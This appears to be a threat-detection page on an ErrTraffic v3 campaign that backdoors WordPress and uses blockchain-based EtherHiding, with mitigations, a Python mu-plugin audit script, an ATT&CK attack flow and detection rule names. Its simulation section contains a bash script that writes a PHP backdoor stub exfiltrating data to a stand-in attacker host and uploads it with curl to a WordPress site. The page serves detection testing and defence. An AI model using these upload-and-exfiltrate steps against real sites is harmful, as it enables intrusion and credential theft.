ErrTraffic v3 Uses EtherHiding in ClickFix Campaigns
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report describes a new campaign that uses the ErrTraffic v3 tool to compromise WordPress sites by installing a mu‑plugin backdoor. The backdoor injects obfuscated JavaScript that retrieves additional payloads via a blockchain‑based EtherHiding technique. The final stage delivers OS‑specific malicious code, including an encrypted PowerShell payload, to victim browsers. Operational security mistakes such as hard‑coded keys expose the infrastructure.
Investigation
LevelBlue SpiderLabs examined the WordPress mu‑plugin backdoor, the embedded JavaScript beacon, and the ErrTraffic V3 control panel. They traced the use of static XOR keys, Base64 decoding, and smart‑contract calls to Polygon RPC nodes. The analysis also identified the hard‑coded authentication key used for API communication and mapped the hosting infrastructure across several bullet‑proof providers.
Mitigation
Defenders should remove the mu‑plugin backdoor, block known malicious TLDs and IP ranges, monitor for the hard‑coded API key usage, and restrict outbound connections to blockchain RPC endpoints. Regularly audit WordPress installations for unexpected mu‑plugins and validate file integrity. Deploy web‑application firewalls to detect the beaconing JavaScript patterns.
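The mu-plugin audit and file-integrity check recommended above can be scripted. The following is an added example, not code from the LevelBlue report or from WordPress: it walks a mu-plugins directory, flags files missing from a SHA-256 allowlist or whose hash has changed, and scans file contents for the indicators the report describes (navigator.sendBeacon beaconing, blockchain RPC lookups, Base64/XOR decoding). The directory, the allowlist, the sample plugin files and the polygon-rpc.example host are all constructed for the demonstration.

```python
# Added example (not from the report): audit a WordPress mu-plugins tree for
# unexpected files, modified files, and the beacon/EtherHiding indicators the
# report describes. All paths, hashes and sample files are constructed.
import hashlib
import re
import tempfile
from pathlib import Path

# Content indicators drawn from the report's description of the backdoor:
# sendBeacon-based beaconing, blockchain RPC lookups, Base64/XOR decoding.
INDICATOR_PATTERNS = {
    "sendBeacon": re.compile(r"navigator\.sendBeacon", re.I),
    "rpc_endpoint": re.compile(r"publicnode|polygon-rpc|eth_call", re.I),
    "base64_decode": re.compile(r"\batob\s*\(|base64_decode\s*\(", re.I),
    # e.g. "c ^ key[i % key.length]" or "x ^ k.charCodeAt(i % k.length)"
    "xor_loop": re.compile(r"\^\s*[\w.]+\s*[\[(][^\])]*%"),
    "php_eval": re.compile(r"\beval\s*\(", re.I),
}


def sha256_file(path: Path) -> str:
    """Hex SHA-256 of a file, used for the integrity allowlist."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit_mu_plugins(mu_dir: Path, allowlist: dict) -> dict:
    """Return {relative_path: [reasons]} for every file that is not on the
    allowlist, has a changed hash, or contains an indicator pattern."""
    findings = {}
    for path in sorted(Path(mu_dir).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(mu_dir).as_posix()
        reasons = []
        expected = allowlist.get(rel)
        if expected is None:
            reasons.append("not in allowlist")
        elif expected != sha256_file(path):
            reasons.append("hash mismatch")
        text = path.read_text(errors="replace")
        hits = [name for name, pat in INDICATOR_PATTERNS.items() if pat.search(text)]
        if hits:
            reasons.append("indicators: " + ",".join(hits))
        if reasons:
            findings[rel] = reasons
    return findings


def build_demo_tree() -> tuple:
    """Create a constructed mu-plugins tree: one allowlisted benign plugin and
    one sample modelled on the reported session-manager.php backdoor."""
    mu_dir = Path(tempfile.mkdtemp(prefix="mu-plugins-"))
    benign = mu_dir / "health-check.php"
    benign.write_text("<?php\n// constructed benign mu-plugin\nadd_action('init', function () {});\n")
    suspicious = mu_dir / "session-manager.php"
    suspicious.write_text(
        "<?php\n// constructed sample, not the real backdoor\n"
        "echo '<script>'\n"
        "  . 'var k=\"xk\",s=atob(\"Y29uc3RydWN0ZWQ=\"),o=\"\";'\n"
        "  . 'for(var i=0;i<s.length;i++){o+=String.fromCharCode(s.charCodeAt(i) ^ k.charCodeAt(i % k.length));}'\n"
        "  . 'fetch(\"https://polygon-rpc.example/\",{method:\"POST\"});'\n"
        "  . 'navigator.sendBeacon(o, document.cookie);'\n"
        "  . '</script>';\n"
    )
    allowlist = {"health-check.php": sha256_file(benign)}
    return mu_dir, allowlist


def run_demo() -> tuple:
    """Audit the constructed tree, then modify the benign plugin in place and
    audit again so the hash-mismatch path is exercised; returns both results."""
    mu_dir, allowlist = build_demo_tree()
    before = audit_mu_plugins(mu_dir, allowlist)
    (mu_dir / "health-check.php").write_text("<?php // modified in place\n")
    after = audit_mu_plugins(mu_dir, allowlist)
    return before, after


if __name__ == "__main__":
    for label, result in zip(("initial", "after tamper"), run_demo()):
        print(label, result)
```

In production the allowlist would be generated from a known-good deployment (or from package manifests) and stored outside the web root, and the audit would run on a schedule so that a new mu-plugin is reported on the first run after it appears rather than after a compromise is already noticed.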
Response
Upon detection, isolate the affected web server, remove the backdoor files, and rotate all administrator credentials. Block the identified malicious domains and RPC endpoints at the network perimeter. Conduct a full forensic review to identify any downloaded payloads and monitor for continued C2 activity using the disclosed API token.
Attack Flow
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    %% Node definitions
    step_initial_access["<b>Action</b> – <b>T1659 Content Injection</b><br/>Exploit WordPress site to upload malicious mu-plugin (session-manager.php)"]
    class step_initial_access action
    step_persistence["<b>Action</b> – <b>T1671 Cloud Application Integration</b> / <b>T1525 Implant Internal Image</b><br/>Backdoor installed as a must-use plugin running on every request"]
    class step_persistence action
    step_credential_access["<b>Action</b> – <b>T1056.003 Input Capture</b><br/>Injected JavaScript captures admin credentials and sends them to attacker"]
    class step_credential_access action
    step_c2["<b>Action</b> – <b>T1102.003 Web Service One-Way Communication</b><br/>Beacon sends visitor data via navigator.sendBeacon to attacker domains"]
    class step_c2 action
    step_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files</b><br/>Payloads encoded with Base64 and XOR, embedded in inline scripts"]
    class step_obfuscation action
    step_smart_contract["<b>Action</b> – <b>T1059.009 Cloud API</b><br/>Script queries Polygon RPC endpoints and smart contracts (EtherHiding) for URLs"]
    class step_smart_contract action
    step_dead_drop["<b>Action</b> – <b>T1102.001</b><br/>Uses blockchain as dead-drop for C2 configuration"]
    class step_dead_drop action
    step_encrypted["<b>Action</b> – <b>T1573.001 Symmetric Cryptography</b><br/>API traffic encrypted with AES-GCM or RC4 using hard-coded key"]
    class step_encrypted action
    step_execution["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Downloader creates temp directory, writes executable and fetches OS-specific payload"]
    class step_execution action
    step_priv_esc["<b>Action</b> – <b>T1546.016 Installer Packages</b><br/>PowerShell script registers as installer package to maintain foothold"]
    class step_priv_esc action
    %% Connections
    step_initial_access -->|leads to| step_persistence
    step_persistence -->|enables| step_credential_access
    step_credential_access -->|provides| step_c2
    step_c2 -->|uses| step_obfuscation
    step_obfuscation -->|facilitates| step_smart_contract
    step_smart_contract -->|stores| step_dead_drop
    step_dead_drop -->|delivers| step_encrypted
    step_encrypted -->|supports| step_execution
    step_execution -->|enables| step_priv_esc
Detections
- Suspicious Command Line Contains UNC Path with Executable as an Argument (via cmdline)
- Possible ClickFix Attack Patterns In Command Line (via cmdline)
- Possible Powershell Executing Process In Suspicious Directory (via cmdline)
- Call Suspicious .NET Methods from Powershell (via powershell)
- Possible Powershell Obfuscation Indicators (via powershell)
- Possible Publicnode Ethereum Abuse Attempt As C2 Channel (via dns_query)
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- Detection of Obfuscated PowerShell Payload with Forced TLS 1.2 Usage [Windows Powershell]
- Detection of Embedded JavaScript and WordPress Backdoor [Webserver]
- Detection of ErrTraffic V3 Activity in Compromised WordPress Sites [Webserver]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
An attacker has compromised a WordPress admin account and uploads a malicious PHP file named session-manager.php into the webroot. The file contains a benign-looking HTML section that ends with an inline <script> block whose comment reads "JavaScript embedded at the end of the section". The script performs a stealthy data exfiltration to a cloud storage bucket (simulated via a curl POST). No use of navigator.sendBeacon() is present, keeping the request within the rule's detection window.
- Upload malicious backdoor:
curl -u admin:password -F "file=@session-manager.php" "http://target.example.com/wp-admin/async-upload.php"
- Trigger the backdoor (generates the detection-triggering telemetry):
curl -s "http://target.example.com/wp-content/uploads/session-manager.php?cmd=exfiltrate"
Regression Test Script:
#!/usr/bin/env bash
#
# Simulates uploading and invoking a malicious WordPress backdoor
# that contains the exact phrase the Sigma rule watches for.
#
set -euo pipefail

TARGET="http://target.example.com"
ADMIN_USER="admin"
ADMIN_PASS="password"

# 1. Create the malicious PHP payload locally
cat > session-manager.php <<'EOF'
<?php
// JavaScript embedded at the end of the section
echo "<!DOCTYPE html><html><body>";
echo "<script>/* malicious code */</script>";
echo "</body></html>";

// Simple exfiltration stub (no sendBeacon)
if (isset($_GET['cmd']) && $_GET['cmd'] === 'exfiltrate') {
    $data = base64_encode('stolen_credentials');
    $url = "https://malicious-storage.example.com/upload";
    $options = array(
        'http' => array(
            'method'  => "POST",
            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
            'content' => http_build_query(array('data' => $data)),
        ),
    );
    $context = stream_context_create($options);
    file_get_contents($url, false, $context);
}
?>
EOF

# 2. Upload the payload via WordPress's async upload endpoint
curl -s -u "${ADMIN_USER}:${ADMIN_PASS}" -F "file=@session-manager.php" "${TARGET}/wp-admin/async-upload.php" >/dev/null
echo "[+] Uploaded malicious session-manager.php"

# 3. Invoke the backdoor to generate detection-visible traffic
curl -s "${TARGET}/wp-content/uploads/session-manager.php?cmd=exfiltrate" >/dev/null
echo "[+] Triggered backdoor – detection telemetry should now be present"

# 4. Optional: pause for SIEM ingestion
sleep 5
Cleanup Commands:
# Remove the malicious file from the server (requires admin SSH access)
ssh admin@target.example.com "rm -f /var/www/html/wp-content/uploads/session-manager.php"
echo "[+] Cleanup complete – backdoor removed"